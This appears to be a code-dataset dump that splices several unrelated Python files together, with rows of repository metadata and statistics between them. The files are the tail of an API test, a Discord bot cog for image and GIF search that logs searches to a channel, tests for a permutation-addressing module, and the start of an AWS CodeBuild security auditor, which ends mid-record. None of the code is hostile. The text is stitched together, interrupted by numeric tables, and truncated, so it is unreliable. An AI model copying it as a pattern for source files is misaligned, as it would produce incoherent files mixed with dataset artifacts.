api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.BatchUpdateHostMetadata',
api_request, expect_errors=True)
self.assertEqual('400 Bad Request', api_response.status)
expected_error_msg = (
b'Hosts [host1, host2] are not enabled to be updated '
b'from UI. ')
self.assertIn(expected_error_msg, api_response.body)
self.assertIsNone(datastore_entities.HostUpdateState.get_by_id(hostname1))
self.assertIsNone(datastore_entities.HostUpdateState.get_by_id(hostname2))
if __name__ == '__main__':
unittest.main()
| 44.726658 | 80 | 0.67331 | 12,135 | 105,868 | 5.59316 | 0.043675 | 0.088842 | 0.023176 | 0.023515 | 0.891076 | 0.865101 | 0.84085 | 0.827914 | 0.801895 | 0.787014 | 0 | 0.020585 | 0.221294 | 105,868 | 2,366 | 81 | 44.745562 | 0.802717 | 0.056948 | 0 | 0.763593 | 0 | 0 | 0.101671 | 0.031521 | 0 | 0 | 0 | 0 | 0.232624 | 1 | 0.033097 | false | 0 | 0.006147 | 0 | 0.040189 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b220d509220b6c8860cb9d4b15942fc941ae6eb3 | 15,526 | py | Python | cogs/order.py | JDJGInc/JDBot | 057bcc5c80452c9282606e9bf66219e614aac5e1 | [
"MIT"
] | 12 | 2021-01-09T06:17:51.000Z | 2022-03-18T06:30:15.000Z | cogs/order.py | JDJGInc/JDBot | 057bcc5c80452c9282606e9bf66219e614aac5e1 | [
"MIT"
] | 21 | 2021-03-21T16:43:45.000Z | 2022-02-01T16:02:26.000Z | cogs/order.py | JDJGInc/JDBot | 057bcc5c80452c9282606e9bf66219e614aac5e1 | [
"MIT"
] | 25 | 2021-03-21T16:33:56.000Z | 2022-03-12T16:52:25.000Z | import os, discord, time, async_cse, random, cse
from discord.ext import commands
from difflib import SequenceMatcher
from discord.ext.commands.cooldowns import BucketType
import utils
from aiogifs.tenor import TenorClient, ContentFilter
from aiogifs.giphy import GiphyClient, AgeRating
class Order(commands.Cog):
"Commands to get (images or gifs) or search results from very specific apis like tenor, giphy, and google custom search"
def __init__(self, bot):
self.bot = bot
bot.loop.create_task(self.__ainit__())
async def __ainit__(self):
await self.bot.wait_until_ready()
tenor_key = os.environ["tenor_key"]
giphy_key = os.environ["giphy_token"]
image_api_key = os.environ["image_api_key"]
image_engine_key = os.environ["google_image_key"]
self.image_client = async_cse.Search(image_api_key, engine_id = image_engine_key, session = self.bot.session)
self.tenor_client = TenorClient (api_key = tenor_key, session = self.bot.session)
self.giphy_client = GiphyClient(api_key=giphy_key, session = self.bot.session)
self.google_engine = cse.Search(image_api_key, session = self.bot.session, engine_id = image_engine_key)
@commands.cooldown(1, 30, BucketType.user)
@commands.group(name = "order", invoke_without_command = True, brief = "searches from google images to find the closest google image")
async def order(self, ctx, *, args = None):
if not args:
await ctx.send("You can't order nothing.")
ctx.command.reset_cooldown(ctx)
if args:
time_before = time.perf_counter()
try:
results = await self.image_client.search(args, safesearch = True, image_search = True)
emoji_image = sorted(results, key = lambda x: SequenceMatcher(None, x.image_url, args).ratio())[-1]
except async_cse.search.NoResults:
return await ctx.send("No results found :(")
time_after = time.perf_counter()
try:
await ctx.message.delete()
except discord.errors.Forbidden:
pass
embed = discord.Embed(title = f"Item: {args}", description=f"{ctx.author} ordered a {args}", color = random.randint(0, 16777215), timestamp = ctx.message.created_at)
embed.set_author(name=f"order for {ctx.author}:", icon_url = (ctx.author.display_avatar.url))
embed.add_field(name="Time Spent:", value = f"{int((time_after - time_before)*1000)}MS")
embed.add_field(name="Powered by:", value="Google Images Api")
embed.add_field(name = "Image link:", value = f"[Image Link]({emoji_image.image_url})")
embed.set_image(url = emoji_image.image_url)
embed.set_footer(text = f"{ctx.author.id} \nCopyright: I don't know the copyright.")
await ctx.send(content="Order has been logged for safety purposes(we want to make sure no unsafe search is sent)", embed = embed)
await self.bot.get_channel(855217084710912050).send(embed = embed)
@commands.cooldown(1, 30, BucketType.user)
@order.command(brief = "a command to shuffle images from google images")
async def shuffle(self, ctx, *, args = None):
if not args:
await self.order(ctx, args="shuffle")
if args:
time_before=time.perf_counter()
try:
results = await self.image_client.search(args, safesearch = True, image_search=True)
except async_cse.search.NoResults:
return await ctx.send("No results found :(")
emoji_image = random.choice(results)
time_after=time.perf_counter()
try:
await ctx.message.delete()
except discord.errors.Forbidden:
pass
embed = discord.Embed(title=f"Item: {args}", description=f"{ctx.author} ordered a {args}",color=random.randint(0, 16777215),timestamp=ctx.message.created_at)
embed.set_author(name=f"order for {ctx.author}:",icon_url=(ctx.author.display_avatar.url))
embed.add_field(name="Time Spent:",value=f"{int((time_after - time_before)*1000)}MS")
embed.add_field(name="Powered by:",value="Google Images Api")
embed.add_field(name = "Image link:", value = f"[Image Link]({emoji_image.image_url})")
embed.set_image(url=emoji_image.image_url)
embed.set_footer(text = f"{ctx.author.id} \nCopyright: I don't know the copyright.")
await ctx.send(content="Order has been logged for safety purposes(we want to make sure no unsafe search is sent)",embed=embed)
await self.bot.get_channel(855217084710912050).send(embed=embed)
@commands.cooldown(1, 30, BucketType.user)
@commands.command(brief="a command to shuffle images from google images", aliases=["order-shuffle"])
async def order_shuffle(self, ctx, *, args = None):
if not args:
await ctx.send("You can't order nothing")
ctx.command.reset_cooldown(ctx)
if args:
time_before=time.perf_counter()
try:
results = await self.image_client.search(args, safesearch = True, image_search=True)
except async_cse.search.NoResults:
return await ctx.send("No results found :(")
emoji_image = random.choice(results)
time_after = time.perf_counter()
try:
await ctx.message.delete()
except discord.errors.Forbidden:
pass
embed = discord.Embed(title=f"Item: {args}", description=f"{ctx.author} ordered a {args}", color=random.randint(0, 16777215), timestamp=ctx.message.created_at)
embed.set_author(name=f"order for {ctx.author}:",icon_url=(ctx.author.display_avatar.url))
embed.add_field(name="Time Spent:",value=f"{int((time_after - time_before)*1000)}MS")
embed.add_field(name="Powered by:",value="Google Images Api")
embed.add_field(name = "Image link:", value = f"[Image Link]({emoji_image.image_url})")
embed.set_image(url=emoji_image.image_url)
embed.set_footer(text = f"{ctx.author.id} \nCopyright: I don't know the copyright.")
await ctx.send(content="Order has been logged for safety purposes(we want to make sure no unsafe search is sent)",embed=embed)
await self.bot.get_channel(855217084710912050).send(embed=embed)
@commands.cooldown(1, 30, BucketType.user)
@commands.group(name = "tenor", invoke_without_command = True, brief = "searches from tenor to find the closest image.")
async def tenor(self, ctx, *, args = None):
if not args:
return await ctx.send("You can't search for nothing")
ctx.command.reset_cooldown(ctx)
safesearch_type = ContentFilter.high()
results = await self.tenor_client.search(args, content_filter = safesearch_type, limit = 10)
if not results:
return await ctx.send("I got no results from tenor.")
results_media = [r for r in results.media if r]
if not results_media:
return await ctx.send("I got no gif results from tenor.")
gifNearest = sorted(results_media, key=lambda x: SequenceMatcher(None, x.item_url, args).ratio())[-1]
embed = discord.Embed(title=f"Item: {args}", description = f"{ctx.author} ordered a {args}", color = random.randint(0, 16777215), timestamp = ctx.message.created_at)
embed.set_author(name = f"order for {ctx.author}:", icon_url= ctx.author.display_avatar.url)
embed.add_field(name = "Powered by:", value="Tenor")
if gifNearest.gif: embed.set_image(url= gifNearest.gif.url)
else: embed.set_image("https://i.imgur.com/sLQzAiW.png")
embed.set_footer(text = f"{ctx.author.id}")
await ctx.send(content = "Tenor has been logged for safety purposes(we want to make sure no unsafe search is sent)", embed = embed)
await self.bot.get_channel(855217084710912050).send(embed = embed)
@commands.cooldown(1, 30, BucketType.user)
@tenor.command(help = "shuffles the results from the tenor results", name = "shuffle")
async def tenor_random(self, ctx, *, args = None):
if not args:
return await self.tenor(ctx, args="shuffle")
safesearch_type = ContentFilter.high()
results = await self.tenor_client.search(args, content_filter = safesearch_type, limit = 10)
if not results:
return await ctx.send("I got no results from tenor.")
results_media = [r for r in results.media if r]
if not results_media:
return await ctx.send("I got no gif results from tenor.")
gifNearest = random.choice(results_media)
embed = discord.Embed(title=f"Item: {args}", description = f"{ctx.author} ordered a {args}", color = random.randint(0, 16777215), timestamp = ctx.message.created_at)
embed.set_author(name = f"order for {ctx.author}:", icon_url= ctx.author.display_avatar.url)
embed.add_field(name = "Powered by:", value="Tenor")
if gifNearest.gif: embed.set_image(url= gifNearest.gif.url)
else: embed.set_image("https://i.imgur.com/sLQzAiW.png")
embed.set_footer(text = f"{ctx.author.id}")
await ctx.send(content = "Tenor has been logged for safety purposes(we want to make sure no unsafe search is sent)", embed = embed)
await self.bot.get_channel(855217084710912050).send(embed = embed)
@commands.cooldown(1, 30, BucketType.user)
@commands.command(help = "shuffles the results from the tenor results", aliases = ["tenor-shuffle"])
async def tenor_shuffle(self, ctx, *, args = None):
if not args:
return await self.tenor(ctx, args = "shuffle")
await self.tenor_random(ctx, args = args)
@commands.cooldown(1, 30, BucketType.user)
@commands.group(brief = "looks up an item from giphy.",invoke_without_command = True)
async def giphy(self, ctx, *, args = None):
if not args:
return await ctx.send("That doesn't have any value.")
ctx.command.reset_cooldown(ctx)
safesearch_type = AgeRating.g()
results = await self.giphy_client.search(args, rating = safesearch_type, limit = 10)
if not results:
return await ctx.send("I got no results from tenor.")
results_media = [r for r in results.media if r]
if not results_media:
return await ctx.send("I got no gif results from giphy.")
gifNearest = sorted(results_media, key = lambda x: SequenceMatcher(None, x.url, args).ratio())[-1]
embed = discord.Embed(title=f"Item: {args}", description = f"{ctx.author} ordered a {args}", color=random.randint(0, 16777215), timestamp = ctx.message.created_at)
embed.set_footer(text = f"{ctx.author.id}")
embed.set_author(name = f"order for {ctx.author}:", icon_url = ctx.author.display_avatar.url)
embed.add_field(name = "Powered by:", value="GIPHY")
embed.set_image(url = f"https://media3.giphy.com/media/{gifNearest.id}/giphy.gif")
await ctx.send(content = "Giphy has been logged for safety purposes(we want to make sure no unsafe search is sent)", embed = embed)
await self.bot.get_channel(855217084710912050).send(embed = embed)
@commands.cooldown(1, 30, BucketType.user)
@giphy.command(help = "looks up an item from giphy but shuffled.", name = "shuffle")
async def giphy_random(self, ctx, *, args = None):
if not args:
return await self.giphy(ctx, args = "shuffle")
safesearch_type = AgeRating.g()
results = await self.giphy_client.search(args, rating = safesearch_type, limit = 10)
if not results:
return await ctx.send("I got no results from tenor.")
results_media = [r for r in results.media if r]
if not results_media:
return await ctx.send("I got no gif results from giphy.")
gifNearest = random.choice(results_media)
embed = discord.Embed(title=f"Item: {args}", description = f"{ctx.author} ordered a {args}", color=random.randint(0, 16777215), timestamp = ctx.message.created_at)
embed.set_footer(text = f"{ctx.author.id}")
embed.set_author(name = f"order for {ctx.author}:", icon_url = ctx.author.display_avatar.url)
embed.add_field(name = "Powered by:", value="GIPHY")
embed.set_image(url = f"https://media3.giphy.com/media/{gifNearest.id}/giphy.gif")
await ctx.send(content = "Giphy has been logged for safety purposes(we want to make sure no unsafe search is sent)", embed = embed)
await self.bot.get_channel(855217084710912050).send(embed = embed)
@commands.cooldown(1, 30, BucketType.user)
@commands.command(help = "looks up an item from giphy but shuffled", aliases=["giphy-shuffle"])
async def giphy_shuffle(self, ctx, *, args = None):
if not args:
return await self.giphy(ctx, args = "shuffle")
await self.giphy_random(ctx, args = args)
@commands.cooldown(1, 30, BucketType.user)
@commands.command(brief = "can search a search result from google with safe search!")
async def google(self, ctx, *, args = None):
if not args:
return await ctx.send("You can't search for nothing, as well you need a thing to lokup.")
try:
results = await self.google_engine.search(args, max_results = 10, safe_search = True)
except Exception as e:
return await ctx.send(f"An error occured, error: {e}. Please give this to the owner. This was an error with results")
menu = utils.GoogleEmbed(results, ctx = ctx, delete_message_after = True)
await menu.send(ctx.channel)
@commands.cooldown(1, 30, BucketType.user)
@commands.command(brief = "sends a gif of someone dancing to disco (animated)")
async def disco(self, ctx):
safesearch_type = ContentFilter.high()
results = await self.tenor_client.search("disco", content_filter = safesearch_type, limit = 10)
if not results:
return await ctx.send("I got no results from tenor.")
results_media = [r for r in results.media if r]
if not results_media:
return await ctx.send("I got no gif results from tenor.")
gifNearest = random.choice(results_media)
embed = discord.Embed(title = "Item: disco", description = f"Random Disco Gif:", color=random.randint(0, 16777215), timestamp = ctx.message.created_at)
embed.set_footer(text = f"{ctx.author.id}")
embed.set_author(name = f"Random Disco Gif for {ctx.author}:", icon_url = ctx.author.display_avatar.url)
embed.add_field(name = "Powered by:", value = "Tenor")
if gifNearest.gif: embed.set_image(url= gifNearest.gif.url)
else: embed.set_image("https://i.imgur.com/sLQzAiW.png")
await ctx.send(content = "Disco has been logged for safety purposes(we want to make sure no unsafe search is sent)", embed = embed)
@commands.cooldown(1, 30, BucketType.user)
@commands.command(brief = "sends a gif of someone dancing to all but disco(animated)")
async def dance(self, ctx):
safesearch_type = ContentFilter.high()
results = await self.tenor_client.search("dance", content_filter = safesearch_type, limit = 10)
if not results:
return await ctx.send("I got no results from tenor.")
results_media = [r for r in results.media if r]
if not results_media:
return await ctx.send("I got no gif results from tenor.")
gifNearest = random.choice(results_media)
embed = discord.Embed(title = "Item: dance", description = f"Random Dance Gif:", color=random.randint(0, 16777215), timestamp = ctx.message.created_at)
embed.set_footer(text = f"{ctx.author.id}")
embed.set_author(name = f"Random Dance Gif for {ctx.author}:", icon_url = ctx.author.display_avatar.url)
embed.add_field(name = "Powered by:", value="Tenor")
if gifNearest.gif: embed.set_image(url = gifNearest.gif.url)
else: embed.set_image("https://i.imgur.com/sLQzAiW.png")
await ctx.send(content = "Dance has been logged for safety purposes(we want to make sure no unsafe search is sent)", embed = embed)
def setup(bot):
bot.add_cog(Order(bot)) | 41.292553 | 171 | 0.69638 | 2,270 | 15,526 | 4.659912 | 0.098238 | 0.028928 | 0.034033 | 0.032331 | 0.849877 | 0.838533 | 0.825676 | 0.813292 | 0.812819 | 0.794006 | 0 | 0.021521 | 0.179956 | 15,526 | 376 | 172 | 41.292553 | 0.809299 | 0.0076 | 0 | 0.708502 | 0 | 0.008097 | 0.247376 | 0.009854 | 0 | 0 | 0 | 0 | 0 | 1 | 0.008097 | false | 0.012146 | 0.02834 | 0 | 0.133603 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b27f880675c28a2bae324963986fb8f13f8d750e | 4,468 | py | Python | tests/permutation/test_assign_ts_addresses.py | David-Durst/aetherling | 91bcf0579608ccbf7d42a7bddf90ccd4257d6571 | [
"MIT"
] | 10 | 2018-04-03T01:51:16.000Z | 2022-02-07T04:27:26.000Z | tests/permutation/test_assign_ts_addresses.py | David-Durst/aetherling | 91bcf0579608ccbf7d42a7bddf90ccd4257d6571 | [
"MIT"
] | 19 | 2018-05-20T00:43:31.000Z | 2021-03-18T20:36:52.000Z | tests/permutation/test_assign_ts_addresses.py | David-Durst/aetherling | 91bcf0579608ccbf7d42a7bddf90ccd4257d6571 | [
"MIT"
] | 1 | 2018-07-11T23:36:43.000Z | 2018-07-11T23:36:43.000Z | from aetherling.modules.permutation.assign_ts_addresses import *
def test_flat_idxs_tseq_3_0():
tseq_3_0 = ST_TSeq(3, 0, ST_Int())
flat_idxs = dimensions_to_flat_idx(tseq_3_0)
assert flat_idxs == [[FlatIndex(False, 0)],[FlatIndex(False, 1)],[FlatIndex(False, 2)]]
def test_flat_idxs_tseq_3_3():
tseq_3_0 = ST_TSeq(3, 3, ST_Int())
flat_idxs = dimensions_to_flat_idx(tseq_3_0)
assert flat_idxs == [[FlatIndex(False, 0)],[FlatIndex(False, 1)],[FlatIndex(False, 2)],
[FlatIndex(True, 0)],[FlatIndex(True, 1)],[FlatIndex(True, 2)]]
def test_flat_idxs_sseq_3():
sseq_3 = ST_SSeq(3, ST_Int())
flat_idxs = dimensions_to_flat_idx(sseq_3)
assert flat_idxs == [[FlatIndex(False, 0), FlatIndex(False, 1), FlatIndex(False, 2)]]
def test_flat_idxs_tseq_2_0_sseq_3():
vals = ST_TSeq(2, 0, ST_SSeq(3, ST_Int()))
flat_idxs = dimensions_to_flat_idx(vals)
assert flat_idxs == [[FlatIndex(False, 0), FlatIndex(False, 1), FlatIndex(False, 2)],
[FlatIndex(False, 3), FlatIndex(False, 4), FlatIndex(False, 5)]]
def test_flat_idxs_tseq_2_1_sseq_3():
vals = ST_TSeq(2, 1, ST_SSeq(3, ST_Int()))
flat_idxs = dimensions_to_flat_idx(vals)
assert flat_idxs == [[FlatIndex(False, 0), FlatIndex(False, 1), FlatIndex(False, 2)],
[FlatIndex(False, 3), FlatIndex(False, 4), FlatIndex(False, 5)],
[FlatIndex(True, 0), FlatIndex(True, 1), FlatIndex(True, 2)]]
def test_flat_idxs_tseq_2_0_tseq_1_1():
vals = ST_TSeq(2, 0, ST_TSeq(1, 1, ST_Int()))
flat_idxs = dimensions_to_flat_idx(vals)
assert flat_idxs == [[FlatIndex(False, 0)], [FlatIndex(True, 0)], [FlatIndex(False, 1)], [FlatIndex(True, 1)]]
def test_flat_idxs_tseq_2_2():
vals = ST_TSeq(2, 2, ST_Int())
flat_idxs = dimensions_to_flat_idx(vals)
assert flat_idxs == [[FlatIndex(False, 0)], [FlatIndex(False, 1)], [FlatIndex(True, 0)], [FlatIndex(True, 1)]]
def test_flat_idxs_sseq_3_tseq_2_1():
vals = ST_SSeq(3, ST_TSeq(2, 1, ST_Int()))
flat_idxs = dimensions_to_flat_idx(vals)
assert flat_idxs == [[FlatIndex(False, 0), FlatIndex(False, 2), FlatIndex(False, 4)],
[FlatIndex(False, 1), FlatIndex(False, 3), FlatIndex(False, 5)],
[FlatIndex(True, 0), FlatIndex(True, 1), FlatIndex(True, 2)]]
def test_flat_idxs_tseq_2_0_sseq_3_tseq_2_0():
vals = ST_TSeq(2, 0, ST_SSeq(3, ST_TSeq(2, 0, ST_Int())))
flat_idxs = dimensions_to_flat_idx(vals)
assert flat_idxs == [[FlatIndex(False, 0), FlatIndex(False, 2), FlatIndex(False, 4)],
[FlatIndex(False, 1), FlatIndex(False, 3), FlatIndex(False, 5)],
[FlatIndex(False, 6), FlatIndex(False, 8), FlatIndex(False, 10)],
[FlatIndex(False, 7), FlatIndex(False, 9), FlatIndex(False, 11)]]
def test_input_addr_to_output_addr_flip():
input_type = ST_TSeq(3, 0, ST_SSeq(2, ST_Int()))
output_type = ST_SSeq(2, ST_TSeq(3, 0, ST_Int()))
input_non_nested_ts = dimensions_to_flat_idx(input_type)
output_non_nested_ts = dimensions_to_flat_idx(output_type)
for t in range(3):
for s in range(2):
output_addr = get_output_address_at_input(t, s, input_type, output_type)
assert input_non_nested_ts[t][s] == output_non_nested_ts[output_addr.t][output_addr.s]
def test_input_addr_to_output_addr_flip_invalids():
input_type = ST_TSeq(3, 1, ST_SSeq(2, ST_Int()))
output_type = ST_SSeq(2, ST_TSeq(3, 1, ST_Int()))
input_non_nested_ts = dimensions_to_flat_idx(input_type)
output_non_nested_ts = dimensions_to_flat_idx(output_type)
for t in range(4):
for s in range(2):
output_addr = get_output_address_at_input(t, s, input_type, output_type)
assert input_non_nested_ts[t][s] == output_non_nested_ts[output_addr.t][output_addr.s]
def test_input_to_output_addr_diff_width():
input_type = ST_TSeq(2, 2, ST_SSeq(2, ST_Int()))
output_type = ST_SSeq(4, ST_TSeq(1, 3, ST_Int()))
input_non_nested_ts = dimensions_to_flat_idx(input_type, min_port_width=2, max_port_width=4, total_time=4)
output_non_nested_ts = dimensions_to_flat_idx(output_type)
for t in range(4):
for s in range(4):
output_addr = get_output_address_at_input(t, s, input_type, output_type)
assert input_non_nested_ts[t][s] == output_non_nested_ts[output_addr.t][output_addr.s]
| 51.953488 | 114 | 0.671441 | 716 | 4,468 | 3.807263 | 0.082402 | 0.220836 | 0.088041 | 0.104549 | 0.90022 | 0.881145 | 0.825018 | 0.803742 | 0.784666 | 0.761189 | 0 | 0.0401 | 0.190689 | 4,468 | 85 | 115 | 52.564706 | 0.713772 | 0 | 0 | 0.424658 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.164384 | 1 | 0.164384 | false | 0 | 0.013699 | 0 | 0.178082 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b2a5ed53de40a39f8bf3676d3ca0b4db862534b7 | 34,742 | py | Python | eeauditor/auditors/aws/AWS_CodeBuild_Auditor.py | kbhagi/ElectricEye | 31960e1e1cfb75c5d354844ea9e07d5295442823 | [
"Apache-2.0"
] | 442 | 2020-03-15T20:56:36.000Z | 2022-03-31T22:13:07.000Z | eeauditor/auditors/aws/AWS_CodeBuild_Auditor.py | kbhagi/ElectricEye | 31960e1e1cfb75c5d354844ea9e07d5295442823 | [
"Apache-2.0"
] | 57 | 2020-03-15T22:09:56.000Z | 2022-03-31T13:17:06.000Z | eeauditor/auditors/aws/AWS_CodeBuild_Auditor.py | kbhagi/ElectricEye | 31960e1e1cfb75c5d354844ea9e07d5295442823 | [
"Apache-2.0"
] | 59 | 2020-03-15T21:19:10.000Z | 2022-03-31T15:01:31.000Z | #This file is part of ElectricEye.
#SPDX-License-Identifier: Apache-2.0
#Licensed to the Apache Software Foundation (ASF) under one
#or more contributor license agreements. See the NOTICE file
#distributed with this work for additional information
#regarding copyright ownership. The ASF licenses this file
#to you under the Apache License, Version 2.0 (the
#"License"); you may not use this file except in compliance
#with the License. You may obtain a copy of the License at
#http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing,
#software distributed under the License is distributed on an
#"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
#KIND, either express or implied. See the License for the
#specific language governing permissions and limitations
#under the License.
import boto3
import datetime
from check_register import CheckRegister
registry = CheckRegister()
# import boto3 clients
codebuild = boto3.client("codebuild")
# loop through all CodeBuild projects and list their attributes
def get_code_build_projects(cache):
response = cache.get("code_build_projects")
if response:
return response
project_list = codebuild.list_projects()
if project_list["projects"]:
my_projects = codebuild.batch_get_projects(names=project_list["projects"])
cache["code_build_projects"] = my_projects
return cache["code_build_projects"]
else:
return {}
@registry.register_check("codebuild")
def artifact_encryption_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[CodeBuild.1] CodeBuild projects should not have artifact encryption disabled"""
project = get_code_build_projects(cache=cache)
myCodeBuildProjects = project.get("projects", [])
for projects in myCodeBuildProjects:
buildProjectName = str(projects["name"])
buildProjectArn = str(projects["arn"])
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
# check if this project supports artifacts
artifactCheck = str(projects["artifacts"]["type"])
# skip projects without artifacts
if artifactCheck == "NO_ARTIFACTS":
continue
else:
# check if encryption for artifacts is disabled
artifactEncryptionCheck = str(projects["artifacts"]["encryptionDisabled"])
if artifactEncryptionCheck == "True":
finding = {
"SchemaVersion": "2018-10-08",
"Id": buildProjectArn + "/unencrypted-artifacts",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": buildProjectArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[CodeBuild.1] CodeBuild projects should not have artifact encryption disabled",
"Description": "CodeBuild project "
+ buildProjectName
+ " has artifact encryption disabled. Refer to the remediation instructions if this configuration is not intended",
"Remediation": {
"Recommendation": {
"Text": "If your project should have artifact encryption enabled scroll down to item 8 in the Create a Build Project (Console) section of the AWS CodeBuild User Guide",
"Url": "https://docs.aws.amazon.com/codebuild/latest/userguide/create-project.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCodeBuildProject",
"Id": buildProjectArn,
"Partition": "aws",
"Region": awsRegion,
"Details": {"AwsCodeBuildProject": {"Name": buildProjectName}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.DS-1",
"NIST SP 800-53 MP-8",
"NIST SP 800-53 SC-12",
"NIST SP 800-53 SC-28",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": buildProjectArn + "/unencrypted-artifacts",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": buildProjectArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[CodeBuild.1] CodeBuild projects should not have artifact encryption disabled",
"Description": "CodeBuild project "
+ buildProjectName
+ " has artifact encryption enabled.",
"Remediation": {
"Recommendation": {
"Text": "If your project should have artifact encryption enabled scroll down to item 8 in the Create a Build Project (Console) section of the AWS CodeBuild User Guide",
"Url": "https://docs.aws.amazon.com/codebuild/latest/userguide/create-project.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCodeBuildProject",
"Id": buildProjectArn,
"Partition": "aws",
"Region": awsRegion,
"Details": {"AwsCodeBuildProject": {"Name": buildProjectName}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.DS-1",
"NIST SP 800-53 MP-8",
"NIST SP 800-53 SC-12",
"NIST SP 800-53 SC-28",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
@registry.register_check("codebuild")
def insecure_ssl_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[CodeBuild.2] CodeBuild projects should not have insecure SSL configured"""
project = get_code_build_projects(cache=cache)
myCodeBuildProjects = project.get("projects", [])
for projects in myCodeBuildProjects:
buildProjectName = str(projects["name"])
buildProjectArn = str(projects["arn"])
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
# check if Insecure SSL is enabled for your Source
sourceInsecureSslCheck = str(projects["source"]["insecureSsl"])
if sourceInsecureSslCheck != "False":
finding = {
"SchemaVersion": "2018-10-08",
"Id": buildProjectArn + "/insecure-ssl",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": buildProjectArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[CodeBuild.2] CodeBuild projects should not have insecure SSL configured",
"Description": "CodeBuild project "
+ buildProjectName
+ " has insecure SSL configured. Refer to the remediation instructions if this configuration is not intended",
"Remediation": {
"Recommendation": {
"Text": "If your project should not have insecure SSL configured refer to the Troubleshooting CodeBuild section of the AWS CodeBuild User Guide",
"Url": "https://docs.aws.amazon.com/codebuild/latest/userguide/troubleshooting.html#troubleshooting-self-signed-certificate",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCodeBuildProject",
"Id": buildProjectArn,
"Partition": "aws",
"Region": awsRegion,
"Details": {"AwsCodeBuildProject": {"Name": buildProjectName}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.DS-2",
"NIST SP 800-53 SC-8",
"NIST SP 800-53 SC-11",
"NIST SP 800-53 SC-12",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
"ISO 27001:2013 A.13.2.3",
"ISO 27001:2013 A.14.1.2",
"ISO 27001:2013 A.14.1.3",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": buildProjectArn + "/insecure-ssl",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": buildProjectArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[CodeBuild.2] CodeBuild projects should not have insecure SSL configured",
"Description": "CodeBuild project "
+ buildProjectName
+ " doesnt have insecure SSL configured.",
"Remediation": {
"Recommendation": {
"Text": "If your project should not have insecure SSL configured refer to the Troubleshooting CodeBuild section of the AWS CodeBuild User Guide",
"Url": "https://docs.aws.amazon.com/codebuild/latest/userguide/troubleshooting.html#troubleshooting-self-signed-certificate",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCodeBuildProject",
